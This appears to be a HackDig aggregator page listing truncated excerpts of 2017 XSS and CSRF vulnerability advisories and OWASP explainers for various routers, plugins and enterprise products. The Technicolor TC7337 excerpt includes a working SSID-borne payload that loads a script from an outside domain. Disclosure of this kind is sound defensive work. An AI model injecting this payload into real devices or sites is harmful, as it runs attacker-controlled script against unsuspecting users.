HackDig : Dig high-quality web security articles for hacker

CVE-2017-9292, Lansweeper 6.0.0.63 XSS vulnerability

=============================================- Release date: October 05th, 2017- Discovered by: Giovanni Cerrato, Giovanni Guido and BackBox team- Severity: Medium============================================= I. VULNERABILITY-------------------------Lansweeper XSS vulnerability. II. INTRODUCTION-------------------------Lansweeper an Asset Management and Netw
Publish At:2017-10-07 06:20 | Read:759 | Comments:0 | Tags: Xss Vulnerability

CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can (WordPress plugin)

Details================Software: Content AuditVersion: 1.9.1Homepage: https://wordpress.org/plugins/content-audit/Advisory report: https://security.dxw.com/advisories/csrf-xss-content-audit/CVE: Awaiting assignmentCVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)Description================CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almo
Publish At:2017-09-27 05:40 | Read:206 | Comments:0 | Tags: Xss Csrf

Expert disclosed 10 zero-day vulnerabilities in D-Link DIR 850L wireless routers

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link DIR 850L routers and invites users to stop using them. The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in routers from networking equipment manufacturer D-Link that open owners to cyber attacks. The flawed devices are the
Publish At:2017-09-11 20:30 | Read:340 | Comments:0 | Tags:Breaking News Hacking backdoor D-Link DIR 850L wireless rout

EE 4GEE Multiple Security Vulnerabilities Advisory (CSRF/Stored XSS/JSONP)

EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory-------------------------------------------------Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).Vulnerable Software Version: EE60_00_05.00_25.Patched Software Version: EE60_00_05.00_31.Product URL:https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/detailsProof of Co
Publish At:2017-09-08 11:20 | Read:138 | Comments:0 | Tags: Xss Csrf

Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability

Document Title:===============Wibu Systems AG CodeMeter 6.50 - Persistent XSS VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2074ID: FB49498Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754CVE-ID:=======CVE-2017
Publish At:2017-09-04 13:15 | Read:254 | Comments:0 | Tags: Xss Vulnerability

CVE-2017-13671 - MISP Stored XSS

Hi list,We have found a Stored Cross-site scripting vulnerability in MISP (Malware Information Sharing Platform & Threat Sharing).[Description]Cross-site scripting (XSS) vulnerability in the comments of the events within MISP before 2.4.79 allows remoteattackers to inject arbitrary web script or HTML via a POST request.-----------------------------------
Publish At:2017-08-29 08:40 | Read:279 | Comments:0 | Tags: Xss

OWASP Top 10 : Cross-Site Scripting #3 Bad JavaScript Imports

Need to include cross domain resources: The ever growing need of giving a rich user experience to website visitors have made the need for browsers to include cross origin resource. Sometimes these resources can be data, a frame, an image or JavaScript. For example: A website http://example.com can have the following cross origin resources: Data from websit
Publish At:2017-08-28 03:30 | Read:151 | Comments:0 | Tags:OWASP SecureLayer7 Lab Bad JavaScript Imports Client Side At

BlackBoard LMS (9.1.140152.0) Stored XSS/Arbitrary File Upload

Document Title:===============BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File UploadProduct Description:===============The Learning Management System has changed the way students andeducators interact.Blackboard's LMS solutions offer much more than simple, classroom interaction,they support the entire education experience enabling educators
Publish At:2017-08-23 05:20 | Read:212 | Comments:0 | Tags: Xss

OWASP Top 10 #3: Cross-Site Scripting (XSS)

Cross-Site ScriptingCross-site scripting (XSS) attacks involved the injection of malicious code into trusted websites. One of the traditional uses of XSS is a hacker stealing session cookies in order to impersonate another user. Lately, it has been the malicious act used to spread malware, deface websites, and phish for useful credentials. It occurs wh
Publish At:2017-08-17 18:35 | Read:176 | Comments:0 | Tags:Security Awareness OWASP OWASP Top 10 Xss

What should enterprises know about how a stored XSS works

Cross-site scripting, or XSS, is a web application attack that attempts to inject malicious code into a vulnerable application. The application isn't at risk during this attack; XSS' main purpose is to exploit the account or user attempting to use the application.There are a few different types of XSS -- such as stored, reflective and others -- but in this a
Publish At:2017-08-17 08:58 | Read:210 | Comments:0 | Tags: Xss

[CVE-2017-11320] Persistent XSS through the SSID of nearby Wi-Fi devices on Technicolor TC7337

// Device : Technicolor TC7337// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html// XSS through SSID : '><script src=//url.co></script> ( Exactly 32bytes u_u )// ^// 5char domains are running | 'src' does not requires quotes ,and passing the URL with ony '//'// out, grab y
Publish At:2017-08-03 08:15 | Read:226 | Comments:0 | Tags: Xss

CVE-2017-1500 - Relected XSS in IBM WorkLight OAuth Server Web Api

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512☾ Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api ☽======== ☾ Table of Contents ☽ ========================================= 0. Overview 1. Detailed Description 2. Proof Of Concept 3. Solution 4. Disclosure Timeline 5. Thanks & Acknowledgements 6. References 7. Credits 8. Legal No
Publish At:2017-08-02 13:50 | Read:200 | Comments:0 | Tags: Xss

Stored XSS in Salutation Responsive WordPress + BuddyPress Theme could allow logged-in users to do almost anything an ad

Details================Software: Salutation Responsive WordPress + BuddyPress ThemeVersion: 3.0.15Homepage: https://themeforest.net/item/salutation-responsive-wordpress-buddypress-theme/548199Advisory report: https://security.dxw.com/advisories/stored-xss-salutation-theme/CVE: Awaiting assignmentCVSS: 4.9 (Medium; AV:N/AC:M/Au:S/C:P/I:P/A:N)Description======
Publish At:2017-08-01 19:25 | Read:273 | Comments:0 | Tags: Xss

SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products

SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >======================================================================= title: Cross-Site Scripting (XSS) product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP vulnerable version: Firmware v1.9.1 fixed version: Firmware v1.9.1.1 CVE number: impact:
Publish At:2017-07-24 18:45 | Read:282 | Comments:0 | Tags: Xss

Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft)

1. ADVISORY INFORMATIONTitle: Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft)Advisory ID: [ERPSCAN-17-037]Advisory URL: https://erpscan.com/advisories/erpscan-17-037-multiple-xss-vulnerabilities-testservlet-peoplesoft/Risk: MediumDate published: 18.07.2017Vendor contacted: Oracle2. VULNERABILITY INFORMATIONClass: XSS [CWE-79]Impact:
Publish At:2017-07-20 22:21 | Read:266 | Comments:0 | Tags: Xss

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud